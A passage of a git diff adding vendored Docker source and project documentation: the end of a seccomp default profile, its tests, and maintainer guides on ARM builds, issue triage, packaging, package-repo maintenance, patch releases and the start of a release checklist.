[]string{"CAP_SYS_CHROOT"}, + }, + }, + { + Names: []string{ + "delete_module", + "init_module", + "finit_module", + "query_module", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Caps: []string{"CAP_SYS_MODULE"}, + }, + }, + { + Names: []string{ + "acct", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Caps: []string{"CAP_SYS_PACCT"}, + }, + }, + { + Names: []string{ + "kcmp", + "process_vm_readv", + "process_vm_writev", + "ptrace", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Caps: []string{"CAP_SYS_PTRACE"}, + }, + }, + { + Names: []string{ + "iopl", + "ioperm", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Caps: []string{"CAP_SYS_RAWIO"}, + }, + }, + { + Names: []string{ + "settimeofday", + "stime", + "adjtimex", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Caps: []string{"CAP_SYS_TIME"}, + }, + }, + { + Names: []string{ + "vhangup", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Caps: []string{"CAP_SYS_TTY_CONFIG"}, + }, + }, + } + + return &types.Seccomp{ + DefaultAction: types.ActErrno, + ArchMap: arches(), + Syscalls: syscalls, + } +} diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go new file mode 100644 index 0000000000..134692147b --- /dev/null +++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go @@ -0,0 +1,32 @@ +// +build linux + +package seccomp + +import ( + "io/ioutil" + "testing" + + "github.com/docker/docker/oci" +) + +func TestLoadProfile(t *testing.T) { + f, err := ioutil.ReadFile("fixtures/example.json") + if err != nil { + t.Fatal(err) + } + rs := oci.DefaultSpec() + if _, err := LoadProfile(string(f), &rs); err != nil { + t.Fatal(err) + } +} + +func TestLoadDefaultProfile(t *testing.T) { + f, err := ioutil.ReadFile("default.json") + if err != nil { + t.Fatal(err) + } + rs := oci.DefaultSpec() + if _, err := LoadProfile(string(f), &rs); err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go new file mode 100644 index 0000000000..f84b20b6d9 --- /dev/null +++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go @@ -0,0 +1,13 @@ +// +build linux,!seccomp + +package seccomp + +import ( + "github.com/docker/docker/api/types" + "github.com/opencontainers/runtime-spec/specs-go" +) + +// DefaultProfile returns a nil pointer on unsupported systems. +func DefaultProfile(rs *specs.Spec) *types.Seccomp { + return nil +} diff --git a/vendor/github.com/docker/docker/project/ARM.md b/vendor/github.com/docker/docker/project/ARM.md new file mode 100644 index 0000000000..c4d21bf27a --- /dev/null +++ b/vendor/github.com/docker/docker/project/ARM.md @@ -0,0 +1,45 @@ +# ARM support + +The ARM support should be considered experimental. It will be extended step by step in the coming weeks. + +Building a Docker Development Image works in the same fashion as for Intel platform (x86-64). +Currently we have initial support for 32bit ARMv7 devices. + +To work with the Docker Development Image you have to clone the Docker/Docker repo on a supported device. +It needs to have a Docker Engine installed to build the Docker Development Image. + +From the root of the Docker/Docker repo one can use make to execute the following make targets: +- make validate +- make binary +- make build +- make deb +- make bundles +- make default +- make shell +- make test-unit +- make test-integration-cli +- make + +The Makefile does include logic to determine on which OS and architecture the Docker Development Image is built. +Based on OS and architecture it chooses the correct Dockerfile. +For the ARM 32bit architecture it uses `Dockerfile.armhf`. + +So for example in order to build a Docker binary one has to +1. clone the Docker/Docker repository on an ARM device `git clone git@github.com:docker/docker.git` +2. change into the checked out repository with `cd docker` +3. execute `make binary` to create a Docker Engine binary for ARM + +## Kernel modules +A few libnetwork integration tests require that the kernel be +configured with "dummy" network interface and has the module +loaded. However, the dummy module may be not loaded automatically. + +To load the kernel module permanently, run these commands as `root`. + + modprobe dummy + echo "dummy" >> /etc/modules + +On some systems you also have to sync your kernel modules. + + oc-sync-kernel-modules + depmod diff --git a/vendor/github.com/docker/docker/project/BRANCHES-AND-TAGS.md b/vendor/github.com/docker/docker/project/BRANCHES-AND-TAGS.md new file mode 100644 index 0000000000..1c6f232524 --- /dev/null +++ b/vendor/github.com/docker/docker/project/BRANCHES-AND-TAGS.md @@ -0,0 +1,35 @@ +Branches and tags +================= + +Note: details of the release process for the Engine are documented in the +[RELEASE-CHECKLIST](https://github.com/docker/docker/blob/master/project/RELEASE-CHECKLIST.md). + +# Branches + +The docker/docker repository should normally have only three living branches at all time, including +the regular `master` branch: + +## `docs` branch + +The `docs` branch supports documentation updates between product releases. This branch allow us to +decouple documentation releases from product releases. + +## `release` branch + +The `release` branch contains the last _released_ version of the code for the project. + +The `release` branch is only updated at each public release of the project. The mechanism for this +is that the release is materialized by a pull request against the `release` branch which lives for +the duration of the code freeze period. When this pull request is merged, the `release` branch gets +updated, and its new state is tagged accordingly. + +# Tags + +Any public release of a compiled binary, with the logical exception of nightly builds, should have +a corresponding tag in the repository. + +The general format of a tag is `vX.Y.Z[-suffix[N]]`: + +- All of `X`, `Y`, `Z` must be specified (example: `v1.0.0`) +- First release candidate for version `1.8.0` should be tagged `v1.8.0-rc1` +- Second alpha release of a product should be tagged `v1.0.0-alpha1` diff --git a/vendor/github.com/docker/docker/project/CONTRIBUTORS.md b/vendor/github.com/docker/docker/project/CONTRIBUTORS.md new file mode 120000 index 0000000000..44fcc63439 --- /dev/null +++ b/vendor/github.com/docker/docker/project/CONTRIBUTORS.md @@ -0,0 +1 @@ +../CONTRIBUTING.md \ No newline at end of file diff --git a/vendor/github.com/docker/docker/project/GOVERNANCE.md b/vendor/github.com/docker/docker/project/GOVERNANCE.md new file mode 100644 index 0000000000..6ae7baf743 --- /dev/null +++ b/vendor/github.com/docker/docker/project/GOVERNANCE.md @@ -0,0 +1,17 @@ +# Docker Governance Advisory Board Meetings + +In the spirit of openness, Docker created a Governance Advisory Board, and committed to make all materials and notes from the meetings of this group public. +All output from the meetings should be considered proposals only, and are subject to the review and approval of the community and the project leadership. + +The materials from the first Docker Governance Advisory Board meeting, held on October 28, 2014, are available at +[Google Docs Folder](https://goo.gl/Alfj8r) + +These include: + +* First Meeting Notes +* DGAB Charter +* Presentation 1: Introductory Presentation, including State of The Project +* Presentation 2: Overall Contribution Structure/Docker Project Core Proposal +* Presentation 3: Long Term Roadmap/Statement of Direction + + diff --git a/vendor/github.com/docker/docker/project/IRC-ADMINISTRATION.md b/vendor/github.com/docker/docker/project/IRC-ADMINISTRATION.md new file mode 100644 index 0000000000..824a14bd51 --- /dev/null +++ b/vendor/github.com/docker/docker/project/IRC-ADMINISTRATION.md @@ -0,0 +1,37 @@ +# Freenode IRC Administration Guidelines and Tips + +This is not meant to be a general "Here's how to IRC" document, so if you're +looking for that, check Google instead. ♥ + +If you've been charged with helping maintain one of Docker's now many IRC +channels, this might turn out to be useful. If there's information that you +wish you'd known about how a particular channel is organized, you should add +deets here! :) + +## `ChanServ` + +Most channel maintenance happens by talking to Freenode's `ChanServ` bot. For +example, `/msg ChanServ ACCESS LIST` will show you a list of everyone +with "access" privileges for a particular channel. + +A similar command is used to give someone a particular access level. For +example, to add a new maintainer to the `#docker-maintainers` access list so +that they can contribute to the discussions (after they've been merged +appropriately in a `MAINTAINERS` file, of course), one would use `/msg ChanServ +ACCESS #docker-maintainers ADD maintainer`. + +To setup a new channel with a similar `maintainer` access template, use a +command like `/msg ChanServ TEMPLATE maintainer +AV` (`+A` for letting +them view the `ACCESS LIST`, `+V` for auto-voice; see `/msg ChanServ HELP FLAGS` +for more details). + +## Troubleshooting + +The most common cause of not-getting-auto-`+v` woes is people not being +`IDENTIFY`ed with `NickServ` (or their current nickname not being `GROUP`ed with +their main nickname) -- often manifested by `ChanServ` responding to an `ACCESS +ADD` request with something like `xyz is not registered.`. + +This is easily fixed by doing `/msg NickServ IDENTIFY OldNick SecretPassword` +followed by `/msg NickServ GROUP` to group the two nicknames together. See +`/msg NickServ HELP GROUP` for more information. diff --git a/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md b/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md new file mode 100644 index 0000000000..95cb2f1b95 --- /dev/null +++ b/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md @@ -0,0 +1,132 @@ +Triaging of issues +------------------ + +Triage provides an important way to contribute to an open source project. Triage helps ensure issues resolve quickly by: + +- Describing the issue's intent and purpose is conveyed precisely. This is necessary because it can be difficult for an issue to explain how an end user experiences a problem and what actions they took. +- Giving a contributor the information they need before they commit to resolving an issue. +- Lowering the issue count by preventing duplicate issues. +- Streamlining the development process by preventing duplicate discussions. + +If you don't have time to code, consider helping with triage. The community will thank you for saving them time by spending some of yours. + +### 1. Ensure the issue contains basic information + +Before triaging an issue very far, make sure that the issue's author provided the standard issue information. This will help you make an educated recommendation on how this to categorize the issue. Standard information that *must* be included in most issues are things such as: + +- the output of `docker version` +- the output of `docker info` +- the output of `uname -a` +- a reproducible case if this is a bug, Dockerfiles FTW +- host distribution and version ( ubuntu 14.04, RHEL, fedora 23 ) +- page URL if this is a docs issue or the name of a man page + +Depending on the issue, you might not feel all this information is needed. Use your best judgement. If you cannot triage an issue using what its author provided, explain kindly to the author that they must provide the above information to clarify the problem. + +If the author provides the standard information but you are still unable to triage the issue, request additional information. Do this kindly and politely because you are asking for more of the author's time. + +If the author does not respond requested information within the timespan of a week, close the issue with a kind note stating that the author can request for the issue to be +reopened when the necessary information is provided. + +### 2. Classify the Issue + +An issue can have multiple of the following labels. Typically, a properly classified issues should +have: + +- One label identifying its kind (`kind/*`). +- One or multiple labels identifying the functional areas of interest (`area/*`). +- Where applicable, one label categorizing its difficulty (`exp/*`). + +#### Issue kind + +| Kind | Description | +|------------------|---------------------------------------------------------------------------------------------------------------------------------| +| kind/bug | Bugs are bugs. The cause may or may not be known at triage time so debugging should be taken account into the time estimate. | +| kind/enhancement | Enhancement are not bugs or new features but can drastically improve usability or performance of a project component. | +| kind/feature | Functionality or other elements that the project does not currently support. Features are new and shiny. | +| kind/question | Contains a user or contributor question requiring a response. | + +#### Functional area + +| Area | +|---------------------------| +| area/api | +| area/builder | +| area/bundles | +| area/cli | +| area/daemon | +| area/distribution | +| area/docs | +| area/kernel | +| area/logging | +| area/networking | +| area/plugins | +| area/project | +| area/runtime | +| area/security | +| area/security/apparmor | +| area/security/seccomp | +| area/security/selinux | +| area/security/trust | +| area/storage | +| area/storage/aufs | +| area/storage/btrfs | +| area/storage/devicemapper | +| area/storage/overlay | +| area/storage/zfs | +| area/swarm | +| area/testing | +| area/volumes | + +#### Platform + +| Platform | +|---------------------------| +| platform/arm | +| platform/darwin | +| platform/ibm-power | +| platform/ibm-z | +| platform/windows | + +#### Experience level + +Experience level is a way for a contributor to find an issue based on their +skill set. Experience types are applied to the issue or pull request using +labels. + +| Level | Experience level guideline | +|------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| exp/beginner | New to Docker, and possibly Golang, and is looking to help while learning the basics. | +| exp/intermediate | Comfortable with golang and understands the core concepts of Docker and looking to dive deeper into the project. | +| exp/expert | Proficient with Docker and Golang and has been following, and active in, the community to understand the rationale behind design decisions and where the project is headed. | + +As the table states, these labels are meant as guidelines. You might have +written a whole plugin for Docker in a personal project and never contributed to +Docker. With that kind of experience, you could take on an exp/expert level task. + +#### Triage status + +To communicate the triage status with other collaborators, you can apply status +labels to issues. These labels prevent duplicating effort. + +| Status | Description | +|-------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| status/confirmed | You triaged the issue, and were able to reproduce the issue. Always leave a comment how you reproduced, so that the person working on resolving the issue has a way to set up a test-case. +| status/accepted | Apply to enhancements / feature requests that we think are good to have. Adding this label helps contributors find things to work on. +| status/more-info-needed | Apply this to issues that are missing information (e.g. no `docker version` or `docker info` output, or no steps to reproduce), or require feedback from the reporter. If the issue is not updated after a week, it can generally be closed. +| status/needs-attention | Apply this label if an issue (or PR) needs more eyes. + +### 3. Prioritizing issue + +When, and only when, an issue is attached to a specific milestone, the issue can be labeled with the +following labels to indicate their degree of priority (from more urgent to less urgent). + +| Priority | Description | +|-------------|-----------------------------------------------------------------------------------------------------------------------------------| +| priority/P0 | Urgent: Security, critical bugs, blocking issues. P0 basically means drop everything you are doing until this issue is addressed. | +| priority/P1 | Important: P1 issues are a top priority and a must-have for the next release. | +| priority/P2 | Normal priority: default priority applied. | +| priority/P3 | Best effort: those are nice to have / minor issues. | + +And that's it. That should be all the information required for a new or existing contributor to come in an resolve an issue. diff --git a/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md b/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md new file mode 100644 index 0000000000..3763f8798b --- /dev/null +++ b/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md @@ -0,0 +1,74 @@ +# Apt & Yum Repository Maintenance +## A maintainer's guide to managing Docker's package repos + +### How to clean up old experimental debs and rpms + +We release debs and rpms for experimental nightly, so these can build up. +To remove old experimental debs and rpms, and _ONLY_ keep the latest, follow the +steps below. + +1. Checkout docker master + +2. Run clean scripts + +```bash +docker build --rm --force-rm -t docker-dev:master . +docker run --rm -it --privileged \ + -v /path/to/your/repos/dir:/volumes/repos \ + -v $HOME/.gnupg:/root/.gnupg \ + -e GPG_PASSPHRASE \ + -e DOCKER_RELEASE_DIR=/volumes/repos \ + docker-dev:master hack/make.sh clean-apt-repo clean-yum-repo generate-index-listing sign-repos +``` + +3. Upload the changed repos to `s3` (if you host on s3) + +4. Purge the cache, PURGE the cache, PURGE THE CACHE! + +### How to get out of a sticky situation + +Sh\*t happens. We know. Below are steps to get out of any "hash-sum mismatch" or +"gpg sig error" or the likes error that might happen to the apt repo. + +**NOTE:** These are apt repo specific, have had no experimence with anything similar +happening to the yum repo in the past so you can rest easy. + +For each step listed below, move on to the next if the previous didn't work. +Otherwise CELEBRATE! + +1. Purge the cache. + +2. Did you remember to sign the debs after releasing? + +Re-sign the repo with your gpg key: + +```bash +docker build --rm --force-rm -t docker-dev:master . +docker run --rm -it --privileged \ + -v /path/to/your/repos/dir:/volumes/repos \ + -v $HOME/.gnupg:/root/.gnupg \ + -e GPG_PASSPHRASE \ + -e DOCKER_RELEASE_DIR=/volumes/repos \ + docker-dev:master hack/make.sh sign-repos +``` + +Upload the changed repo to `s3` (if that is where you host) + +PURGE THE CACHE. + +3. Run Jess' magical, save all, only in case of extreme emergencies, "you are +going to have to break this glass to get it" script. + +```bash +docker build --rm --force-rm -t docker-dev:master . +docker run --rm -it --privileged \ + -v /path/to/your/repos/dir:/volumes/repos \ + -v $HOME/.gnupg:/root/.gnupg \ + -e GPG_PASSPHRASE \ + -e DOCKER_RELEASE_DIR=/volumes/repos \ + docker-dev:master hack/make.sh update-apt-repo generate-index-listing sign-repos +``` + +4. Upload the changed repo to `s3` (if that is where you host) + +PURGE THE CACHE. diff --git a/vendor/github.com/docker/docker/project/PACKAGERS.md b/vendor/github.com/docker/docker/project/PACKAGERS.md new file mode 100644 index 0000000000..46ea8e7b20 --- /dev/null +++ b/vendor/github.com/docker/docker/project/PACKAGERS.md @@ -0,0 +1,307 @@ +# Dear Packager, + +If you are looking to make Docker available on your favorite software +distribution, this document is for you. It summarizes the requirements for +building and running the Docker client and the Docker daemon. + +## Getting Started + +We want to help you package Docker successfully. Before doing any packaging, a +good first step is to introduce yourself on the [docker-dev mailing +list](https://groups.google.com/d/forum/docker-dev), explain what you're trying +to achieve, and tell us how we can help. Don't worry, we don't bite! There might +even be someone already working on packaging for the same distro! + +You can also join the IRC channel - #docker and #docker-dev on Freenode are both +active and friendly. + +We like to refer to Tianon ("@tianon" on GitHub and "tianon" on IRC) as our +"Packagers Relations", since he's always working to make sure our packagers have +a good, healthy upstream to work with (both in our communication and in our +build scripts). If you're having any kind of trouble, feel free to ping him +directly. He also likes to keep track of what distributions we have packagers +for, so feel free to reach out to him even just to say "Hi!" + +## Package Name + +If possible, your package should be called "docker". If that name is already +taken, a second choice is "docker-engine". Another possible choice is "docker.io". + +## Official Build vs Distro Build + +The Docker project maintains its own build and release toolchain. It is pretty +neat and entirely based on Docker (surprise!). This toolchain is the canonical +way to build Docker. We encourage you to give it a try, and if the circumstances +allow you to use it, we recommend that you do. + +You might not be able to use the official build toolchain - usually because your +distribution has a toolchain and packaging policy of its own. We get it! Your +house, your rules. The rest of this document should give you the information you +need to package Docker your way, without denaturing it in the process. + +## Build Dependencies + +To build Docker, you will need the following: + +* A recent version of Git and Mercurial +* Go version 1.6 or later +* A clean checkout of the source added to a valid [Go + workspace](https://golang.org/doc/code.html#Workspaces) under the path + *src/github.com/docker/docker* (unless you plan to use `AUTO_GOPATH`, + explained in more detail below) + +To build the Docker daemon, you will additionally need: + +* An amd64/x86_64 machine running Linux +* SQLite version 3.7.9 or later +* libdevmapper version 1.02.68-cvs (2012-01-26) or later from lvm2 version + 2.02.89 or later +* btrfs-progs version 3.16.1 or later (unless using an older version is + absolutely necessary, in which case 3.8 is the minimum) +* libseccomp version 2.2.1 or later (for build tag seccomp) + +Be sure to also check out Docker's Dockerfile for the most up-to-date list of +these build-time dependencies. + +### Go Dependencies + +All Go dependencies are vendored under "./vendor". They are used by the official +build, so the source of truth for the current version of each dependency is +whatever is in "./vendor". + +To use the vendored dependencies, simply make sure the path to "./vendor" is +included in `GOPATH` (or use `AUTO_GOPATH`, as explained below). + +If you would rather (or must, due to distro policy) package these dependencies +yourself, take a look at "vendor.conf" for an easy-to-parse list of the +exact version for each. + +NOTE: if you're not able to package the exact version (to the exact commit) of a +given dependency, please get in touch so we can remediate! Who knows what +discrepancies can be caused by even the slightest deviation. We promise to do +our best to make everybody happy. + +## Stripping Binaries + +Please, please, please do not strip any compiled binaries. This is really +important. + +In our own testing, stripping the resulting binaries sometimes results in a +binary that appears to work, but more often causes random panics, segfaults, and +other issues. Even if the binary appears to work, please don't strip. + +See the following quotes from Dave Cheney, which explain this position better +from the upstream Golang perspective. + +### [go issue #5855, comment #3](https://code.google.com/p/go/issues/detail?id=5855#c3) + +> Super super important: Do not strip go binaries or archives. It isn't tested, +> often breaks, and doesn't work. + +### [launchpad golang issue #1200255, comment #8](https://bugs.launchpad.net/ubuntu/+source/golang/+bug/1200255/comments/8) + +> To quote myself: "Please do not strip Go binaries, it is not supported, not +> tested, is often broken, and doesn't do what you want" +> +> To unpack that a bit +> +> * not supported, as in, we don't support it, and recommend against it when +> asked +> * not tested, we don't test stripped binaries as part of the build CI process +> * is often broken, stripping a go binary will produce anywhere from no, to +> subtle, to outright execution failure, see above + +### [launchpad golang issue #1200255, comment #13](https://bugs.launchpad.net/ubuntu/+source/golang/+bug/1200255/comments/13) + +> To clarify my previous statements. +> +> * I do not disagree with the debian policy, it is there for a good reason +> * Having said that, it stripping Go binaries doesn't work, and nobody is +> looking at making it work, so there is that. +> +> Thanks for patching the build formula. + +## Building Docker + +Please use our build script ("./hack/make.sh") for all your compilation of +Docker. If there's something you need that it isn't doing, or something it could +be doing to make your life as a packager easier, please get in touch with Tianon +and help us rectify the situation. Chances are good that other packagers have +probably run into the same problems and a fix might already be in the works, but +none of us will know for sure unless you harass Tianon about it. :) + +All the commands listed within this section should be run with the Docker source +checkout as the current working directory. + +### `AUTO_GOPATH` + +If you'd rather not be bothered with the hassles that setting up `GOPATH` +appropriately can be, and prefer to just get a "build that works", you should +add something similar to this to whatever script or process you're using to +build Docker: + +```bash +export AUTO_GOPATH=1 +``` + +This will cause the build scripts to set up a reasonable `GOPATH` that +automatically and properly includes both docker/docker from the local +directory, and the local "./vendor" directory as necessary. + +### `DOCKER_BUILDTAGS` + +If you're building a binary that may need to be used on platforms that include +AppArmor, you will need to set `DOCKER_BUILDTAGS` as follows: +```bash +export DOCKER_BUILDTAGS='apparmor' +``` + +If you're building a binary that may need to be used on platforms that include +SELinux, you will need to use the `selinux` build tag: +```bash +export DOCKER_BUILDTAGS='selinux' +``` + +If you're building a binary that may need to be used on platforms that include +seccomp, you will need to use the `seccomp` build tag: +```bash +export DOCKER_BUILDTAGS='seccomp' +``` + +There are build tags for disabling graphdrivers as well. By default, support +for all graphdrivers are built in. + +To disable btrfs: +```bash +export DOCKER_BUILDTAGS='exclude_graphdriver_btrfs' +``` + +To disable devicemapper: +```bash +export DOCKER_BUILDTAGS='exclude_graphdriver_devicemapper' +``` + +To disable aufs: +```bash +export DOCKER_BUILDTAGS='exclude_graphdriver_aufs' +``` + +NOTE: if you need to set more than one build tag, space separate them: +```bash +export DOCKER_BUILDTAGS='apparmor selinux exclude_graphdriver_aufs' +``` + +### Static Daemon + +If it is feasible within the constraints of your distribution, you should +seriously consider packaging Docker as a single static binary. A good comparison +is Busybox, which is often packaged statically as a feature to enable mass +portability. Because of the unique way Docker operates, being similarly static +is a "feature". + +To build a static Docker daemon binary, run the following command (first +ensuring that all the necessary libraries are available in static form for +linking - see the "Build Dependencies" section above, and the relevant lines +within Docker's own Dockerfile that set up our official build environment): + +```bash +./hack/make.sh binary +``` + +This will create a static binary under +"./bundles/$VERSION/binary/docker-$VERSION", where "$VERSION" is the contents of +the file "./VERSION". This binary is usually installed somewhere like +"/usr/bin/docker". + +### Dynamic Daemon / Client-only Binary + +If you are only interested in a Docker client binary, you can build using: + +```bash +./hack/make.sh binary-client +``` + +If you need to (due to distro policy, distro library availability, or for other +reasons) create a dynamically compiled daemon binary, or if you are only +interested in creating a client binary for Docker, use something similar to the +following: + +```bash +./hack/make.sh dynbinary-client +``` + +This will create "./bundles/$VERSION/dynbinary-client/docker-$VERSION", which for +client-only builds is the important file to grab and install as appropriate. + +## System Dependencies + +### Runtime Dependencies + +To function properly, the Docker daemon needs the following software to be +installed and available at runtime: + +* iptables version 1.4 or later +* procps (or similar provider of a "ps" executable) +* e2fsprogs version 1.4.12 or later (in use: mkfs.ext4, tune2fs) +* xfsprogs (in use: mkfs.xfs) +* XZ Utils version 4.9 or later +* a [properly + mounted](https://github.com/tianon/cgroupfs-mount/blob/master/cgroupfs-mount) + cgroupfs hierarchy (having a single, all-encompassing "cgroup" mount point + [is](https://github.com/docker/docker/issues/2683) + [not](https://github.com/docker/docker/issues/3485) + [sufficient](https://github.com/docker/docker/issues/4568)) + +Additionally, the Docker client needs the following software to be installed and +available at runtime: + +* Git version 1.7 or later + +### Kernel Requirements + +The Docker daemon has very specific kernel requirements. Most pre-packaged +kernels already include the necessary options enabled. If you are building your +own kernel, you will either need to discover the options necessary via trial and +error, or check out the [Gentoo +ebuild](https://github.com/tianon/docker-overlay/blob/master/app-emulation/docker/docker-9999.ebuild), +in which a list is maintained (and if there are any issues or discrepancies in +that list, please contact Tianon so they can be rectified). + +Note that in client mode, there are no specific kernel requirements, and that +the client will even run on alternative platforms such as Mac OS X / Darwin. + +### Optional Dependencies + +Some of Docker's features are activated by using optional command-line flags or +by having support for them in the kernel or userspace. A few examples include: + +* AUFS graph driver (requires AUFS patches/support enabled in the kernel, and at + least the "auplink" utility from aufs-tools) +* BTRFS graph driver (requires BTRFS support enabled in the kernel) +* ZFS graph driver (requires userspace zfs-utils and a corresponding kernel module) +* Libseccomp to allow running seccomp profiles with containers + +## Daemon Init Script + +Docker expects to run as a daemon at machine startup. Your package will need to +include a script for your distro's process supervisor of choice. Be sure to +check out the "contrib/init" folder in case a suitable init script already +exists (and if one does not, contact Tianon about whether it might be +appropriate for your distro's init script to live there too!). + +In general, Docker should be run as root, similar to the following: + +```bash +docker daemon +``` + +Generally, a `DOCKER_OPTS` variable of some kind is available for adding more +flags (such as changing the graph driver to use BTRFS, switching the location of +"/var/lib/docker", etc). + +## Communicate + +As a final note, please do feel free to reach out to Tianon at any time for +pretty much anything. He really does love hearing from our packagers and wants +to make sure we're not being a "hostile upstream". As should be a given, we +appreciate the work our packagers do to make sure we have broad distribution! diff --git a/vendor/github.com/docker/docker/project/PATCH-RELEASES.md b/vendor/github.com/docker/docker/project/PATCH-RELEASES.md new file mode 100644 index 0000000000..548db9ab4d --- /dev/null +++ b/vendor/github.com/docker/docker/project/PATCH-RELEASES.md @@ -0,0 +1,68 @@ +# Docker patch (bugfix) release process + +Patch releases (the 'Z' in vX.Y.Z) are intended to fix major issues in a +release. Docker open source projects follow these procedures when creating a +patch release; + +After each release (both "major" (vX.Y.0) and "patch" releases (vX.Y.Z)), a +patch release milestone (vX.Y.Z + 1) is created. + +The creation of a patch release milestone is no obligation to actually +*create* a patch release. The purpose of these milestones is to collect +issues and pull requests that can *justify* a patch release; + +- Any maintainer is allowed to add issues and PR's to the milestone, when + doing so, preferably leave a comment on the issue or PR explaining *why* + you think it should be considered for inclusion in a patch release. +- Issues introduced in version vX.Y.0 get added to milestone X.Y.Z+1 +- Only *regressions* should be added. Issues *discovered* in version vX.Y.0, + but already present in version vX.Y-1.Z should not be added, unless + critical. +- Patch releases can *only* contain bug-fixes. New features should + *never* be added to a patch release. + +The release captain of the "major" (X.Y.0) release, is also responsible for +patch releases. The release captain, together with another maintainer, will +review issues and PRs on the milestone, and assigns `priority/`labels. These +review sessions take place on a weekly basis, more frequent if needed: + +- A P0 priority is assigned to critical issues. A maintainer *must* be + assigned to these issues. Maintainers should strive to fix a P0 within a week. +- A P1 priority is assigned to major issues, but not critical. A maintainer + *must* be assigned to these issues. +- P2 and P3 priorities are assigned to other issues. A maintainer can be + assigned. +- Non-critical issues and PR's can be removed from the milestone. Minor + changes, such as typo-fixes or omissions in the documentation can be + considered for inclusion in a patch release. + +## Deciding if a patch release should be done + +- Only a P0 can justify to proceed with the patch release. +- P1, P2, and P3 issues/PR's should not influence the decision, and + should be moved to the X.Y.Z+1 milestone, or removed from the + milestone. + +> **Note**: If the next "major" release is imminent, the release captain +> can decide to cancel a patch release, and include the patches in the +> upcoming major release. + +> **Note**: Security releases are also "patch releases", but follow +> a different procedure. Security releases are developed in a private +> repository, released and tested under embargo before they become +> publicly available. + +## Deciding on the content of a patch release + +When the criteria for moving forward with a patch release are met, the release +manager will decide on the exact content of the release. + +- Fixes to all P0 issues *must* be included in the release. +- Fixes to *some* P1, P2, and P3 issues *may* be included as part of the patch + release depending on the severity of the issue and the risk associated with + the patch. + +Any code delivered as part of a patch release should make life easier for a +significant amount of users with zero chance of degrading anybody's experience. +A good rule of thumb for that is to limit cherry-picking to small patches, which +fix well-understood issues, and which come with verifiable tests. diff --git a/vendor/github.com/docker/docker/project/PRINCIPLES.md b/vendor/github.com/docker/docker/project/PRINCIPLES.md new file mode 100644 index 0000000000..53f03018ec --- /dev/null +++ b/vendor/github.com/docker/docker/project/PRINCIPLES.md @@ -0,0 +1,19 @@ +# Docker principles + +In the design and development of Docker we try to follow these principles: + +(Work in progress) + +* Don't try to replace every tool. Instead, be an ingredient to improve them. +* Less code is better. +* Fewer components are better. Do you really need to add one more class? +* 50 lines of straightforward, readable code is better than 10 lines of magic that nobody can understand. +* Don't do later what you can do now. "//FIXME: refactor" is not acceptable in new code. +* When hesitating between 2 options, choose the one that is easier to reverse. +* No is temporary, Yes is forever. If you're not sure about a new feature, say no. You can change your mind later. +* Containers must be portable to the greatest possible number of machines. Be suspicious of any change which makes machines less interchangeable. +* The less moving parts in a container, the better. +* Don't merge it unless you document it. +* Don't document it unless you can keep it up-to-date. +* Don't merge it unless you test it! +* Everyone's problem is slightly different. Focus on the part that is the same for everyone, and solve that. diff --git a/vendor/github.com/docker/docker/project/README.md b/vendor/github.com/docker/docker/project/README.md new file mode 100644 index 0000000000..3ed68cf297 --- /dev/null +++ b/vendor/github.com/docker/docker/project/README.md @@ -0,0 +1,24 @@ +# Hacking on Docker + +The `project/` directory holds information and tools for everyone involved in the process of creating and +distributing Docker, specifically: + +## Guides + +If you're a *contributor* or aspiring contributor, you should read [CONTRIBUTORS.md](../CONTRIBUTING.md). + +If you're a *maintainer* or aspiring maintainer, you should read [MAINTAINERS](../MAINTAINERS). + +If you're a *packager* or aspiring packager, you should read [PACKAGERS.md](./PACKAGERS.md). + +If you're a maintainer in charge of a *release*, you should read [RELEASE-CHECKLIST.md](./RELEASE-CHECKLIST.md). + +## Roadmap + +A high-level roadmap is available at [ROADMAP.md](../ROADMAP.md). + + +## Build tools + +[hack/make.sh](../hack/make.sh) is the primary build tool for docker. It is used for compiling the official binary, +running the test suite, and pushing releases. diff --git a/vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md b/vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md new file mode 100644 index 0000000000..84848cae2b --- /dev/null +++ b/vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md @@ -0,0 +1,518 @@ +# Release Checklist +## A maintainer's guide to releasing Docker + +So you're in charge of a Docker release? Cool. Here's what to do. + +If your experience deviates from this document, please document the changes +to keep it up-to-date. + +It is important to note that this document assumes that the git remote in your +repository that corresponds to "https://github.com/docker/docker" is named +"origin". If yours is not (for example, if you've chosen to name it "upstream" +or something similar instead), be sure to adjust the listed snippets for your +local environment accordingly. If you are not sure what your upstream remote is +named, use a command like `git remote -v` to find out. + +If you don't have an upstream remote, you can add one easily using something +like: + +```bash +export GITHUBUSER="YOUR_GITHUB_USER" +git remote add origin https://github.com/docker/docker.git +git remote add $GITHUBUSER git@github.com:$GITHUBUSER/docker.git +``` + +### 1. Pull from master and create a release branch + +All releases version numbers will be of the form: vX.Y.Z where X is the major +version number, Y is the minor version number and Z is the patch release version number. + +#### Major releases + +The release branch name is just vX.Y because it's going to be the basis for all .Z releases. + +```bash +export BASE=vX.Y +export VERSION=vX.Y.Z +git fetch origin +git checkout --track origin/master +git checkout -b release/$BASE +``` + +This new 